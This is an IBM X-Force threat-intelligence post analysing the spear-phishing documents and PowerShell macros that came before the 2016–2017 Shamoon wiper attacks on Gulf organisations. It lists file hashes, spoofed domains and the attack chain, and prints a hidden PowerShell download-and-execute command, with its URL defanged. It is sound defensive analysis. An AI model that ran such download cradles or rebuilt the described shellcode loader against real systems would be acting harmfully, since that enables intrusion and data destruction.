Authored by the IBM X-Force Incident Response and Intelligence Services (IRIS) team.

Researchers from the IBM X-Force Incident Response and Intelligence Services (IRIS) team identified a missing link in the operations of a threat actor involved in recent Shamoon malware attacks against Gulf state organizations. These attacks, which occurred in November 2016 and January 2017, reportedly affected thousands of computers across multiple government and civil organizations in Saudi Arabia and elsewhere in Gulf states. Shamoon is designed to destroy computer hard drives by wiping the master boot record (MBR) and data irretrievably, unlike ransomware, which holds the data hostage for a fee.

Through their recent investigations, our forensics analysts pinpointed the initial compromise vector and post-compromise operations that led to the deployment of the destructive Shamoon malware on targeted infrastructures. It’s worth mentioning that, according to X-Force IRIS, the initial compromise took place weeks before the actual Shamoon deployment and activation were launched.

Shamoon Attacks Preceded by Malicious Macros and PowerShell Commands

Since Shamoon incidents feature the infiltration and escalation stages of targeted attacks, X-Force IRIS responders sought out the attackers’ entry point. Their findings pointed to what appears to be the initial point of compromise the attackers used: a document containing a malicious macro that, when approved to execute, enabled C2 communications to the attacker’s server and remote shell via PowerShell.

The document was not the only one discovered in the recent attack waves. X-Force IRIS researchers had been tracking earlier activity associated with similar malicious, PowerShell-laden documents themed as resumes and human resources documents, some of which related to organizations in Saudi Arabia. This research identified several bouts of offensive activity that occurred in the past few months, which revealed similar operational methods in which the attackers served malicious documents and other malware executables from web servers to their targets to establish an initial foothold in the network.

Read the white paper: Dealing with a data breach — Before, During and After

Initial Compromise Vector Previously Unclear

Although Shamoon was previously documented in research blogs, the specific network compromise methods leading to the attacks have remained unclear in the reported cases. X-Force IRIS researchers studied Shamoon’s attack life cycle and observed its tactics at Saudi-based organizations and private sector companies. This research led them to believe that the actor using Shamoon in recent attacks relied heavily on weaponized documents built to leverage PowerShell to establish their initial network foothold and subsequent operations:

  1. Attackers send a spear phishing email to employees at the target organization. The email contains a Microsoft Office document as an attachment.
  2. Opening the attachment from the email invokes PowerShell and enables command line access to the compromised machine.
  3. Attackers can now communicate with the compromised machine and remotely execute commands on it.
  4. The attackers use their access to deploy additional tools and malware to other endpoints or escalate privileges in the network.
  5. Attackers study the network by connecting to additional systems and locating critical servers.
  6. The attackers deploy the Shamoon malware.
  7. A coordinated Shamoon outbreak begins and computer hard drives across the organization are permanently wiped.

Figure 1: Shamoon Attack — Logical Flow of Events

A Phish Is Speared

X-Force IRIS identified the below malicious document:

Detail Info
File name cv_itworx.doc
MD5 45b0e5a457222455384713905f886bd4
SHA256 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62
Hosting URL hxxp://[.]me/cv_itworx.doc
Decode PowerShell.exe -w hidden -noni -nop -c “iex(New-Object System.Net.WebClient).DownloadString(‘hxxp://’)”
Scroll to view full table

Our researchers examined the domain that hosted the first malicious file,[.]me. Per the domain’s WHOIS record, an anonymized registrant registered com-ho[.]me in October 2016 and used it to serve malicious documents with similar macro activation features. The following list of documents included:

File Name File MD5
cv.doc f4d18316e367a80e1005f38445421b1f
cv_itworx.doc 45b0e5a457222455384713905f886bd4
cv_mci.doc f4d18316e367a80e1005f38445421b1f
discount_voucher_codes.xlsm 19cea065aa033f5bcfa94a583ae59c08
Health_insurance_plan.doc ecfc0275c7a73a9c7775130ebca45b74
Health_insurance_registration.doc 1b5e33e5a244d2d67d7a09c4ccf16e56
job_titles.doc fa72c068361c05da65bf2117db76aaa8
job_titles_itworx.doc 43fad2d62bc23ffdc6d301571135222c
job_titles_mci.doc ce25f1597836c28cf415394fb350ae93
Password_Policy.xlsm 03ea9457bf71d51d8109e737158be888
Scroll to view full table

These files were most likely delivered via spear phishing emails to lure employees into unwittingly launching the malicious payload.

A closer review of the file names revealed “IT Worx” and “MCI.” A search of the name IT Worx brings up a global software professional services organization headquartered in Egypt. MCI is Saudi Arabia’s Ministry of Commerce and Investment. It is possible these names were used in spear phishing emails because they would seem benign to Saudi-based employees and lure them to open the attachment.

X-Force IRIS researchers further identified that the threat actor behind the malicious documents served many of them using a URL-shortening scheme in the following pattern: briefl[.]ink/{a-z0-9}[5].

File Detail Info
File name job_titles_itworx.doc
MD5 43fad2d62bc23ffdc6d301571135222c
SHA256 e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6
Hosting URL hxxp://
Scroll to view full table

The following figure is a visual example of what employees may have encountered when they opened the malicious Word files sent to them in preparation for a Shamoon attack:

Figure 2: Malicious Word Document Delivered in Preparation of a Shamoon Malware Attack (Source: X-Force IRIS)

Passive DNS results on a communications domain associated with the Shamoon attack revealed related network infrastructure, identifying additional domains used by the threat actors.

Domain Name Spoofed Site
ntg-sa[.]com The domain ntg-sa[.]com appears to spoof the legit domain associated with the Namer Trading Group. Per their webpage, NTG “was established primarily to cater the growing demands of Petrochemicals waste management within the Kingdom of Saudi Arabia.”
maps-modon[.]club The maps-modon[.]club domain appears to spoof, which is associated with the Saudi Industrial Property Authority, an organization “responsible for the development of industrial cities with integrated infrastructure and services.”
Scroll to view full table

X-Force IRIS discovered that the threat actor was hosting at least one malicious executable on a server hosted on ntg-sa[.]com. This file duped targets into believing it was a Flash player installer that would drop a Windows batch to invoke PowerShell into the same C2 communications.

Breakdown of the PowerShell-Related Macro

Analysis of one of the threat actor’s documents found that if the macro executes, it launches two separate PowerShell Scripts. The first one executes a PowerShell script served from hxxp:// The host is possibly related to attacks that served the Pupy RAT, a publicly available cross-platform remote access tool.

The second script calls VirtualAlloc to create a buffer, uses memset to load Metasploit-related shellcode into that buffer and executes it through CreateThread. Metasploit is an open source framework popular as a tool for developing and executing exploit code against a remote target machine. The shellcode performs a DWORD XOR of 4 bytes at an offset from the beginning of the shellcode that changes the code to create a loop so the XOR continues 0x57 times.

If this execution is successful, it creates a buffer using VirtualAlloc and calls InternetReadFile in a loop until all the file contents are retrieved from hxxp:// This is then returned as a string to PowerShell, which calls invoke-expression (iex) on it, indicating that the expected payload is PowerShell.

Of note, the macro contained a DownloadFile() function that would use URLDownloadToFileA, but this was never actually used.

Based on observations associated with the malicious document, we observed subsequent shell sessions probably associated with Metasploit’s Meterpreter that enabled deployment of additional tools and malware preceding deployment of three Shamoon-related files: ntertmgr32.exe, ntertmgr64.exe and vdsk911.sys.

Shamoon’s Back, But for How Long This Time?

Although the complete list of Shamoon’s victims is not public, Bloomberg reported that in one case, thousands of computers were destroyed at the headquarters of Saudi’s General Authority of Civil Aviation, erasing critical data and bringing operations to a halt for several days.

The recent activity X-Force IRIS is seeing from the Shamoon attackers has so far been detected in two waves, but those are likely to subside following the public attention the cases have garnered since late 2016.

Saudi Arabia released a warning to local organizations about the Shamoon malware, alerting about potential attacks and advising organizations to prepare. Analysis and warnings about Shamoon are resulting in preparation on the targets’ end, and actors are likely to disappear and change their tactics until the next wave of attacks.

Read the white paper: Dealing with a data breach — Before, During and After

For technical details on this research and related indicators of compromise, see the X-Force Advisory on X-Force Exchange.

More from Advanced Threats

Phishing kit trends and the top 10 spoofed brands of 2023

4 min read -  The 2024 IBM X-Force Threat Intelligence Index reported that phishing was one of the top initial access vectors observed last year, accounting for 30% of incidents. To carry out their phishing campaigns, attackers often use phishing kits: a collection of tools, resources and scripts that are designed and assembled to ease deployment. Each phishing kit deployment corresponds to a single phishing attack, and a kit could be redeployed many times during a phishing campaign. IBM X-Force has analyzed thousands of…

Grandoreiro banking trojan unleashed: X-Force observing emerging global campaigns

16 min read - Since March 2024, IBM X-Force has been tracking several large-scale phishing campaigns distributing the Grandoreiro banking trojan, which is likely operated as a Malware-as-a-Service (MaaS). Analysis of the malware revealed major updates within the string decryption and domain generating algorithm (DGA), as well as the ability to use Microsoft Outlook clients on infected hosts to spread further phishing emails. The latest malware variant also specifically targets over 1500 global banks, enabling attackers to perform banking fraud in over 60 countries…

A spotlight on Akira ransomware from X-Force Incident Response and Threat Intelligence

7 min read - This article was made possible thanks to contributions from Aaron Gdanski.IBM X-Force Incident Response and Threat Intelligence teams have investigated several Akira ransomware attacks since this threat actor group emerged in March 2023. This blog will share X-Force’s unique perspective on Akira gained while observing the threat actors behind this ransomware, including commands used to deploy the ransomware, active exploitation of CVE-2023-20269 and analysis of the ransomware binary.The Akira ransomware group has gained notoriety in the current cybersecurity landscape, underscored…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today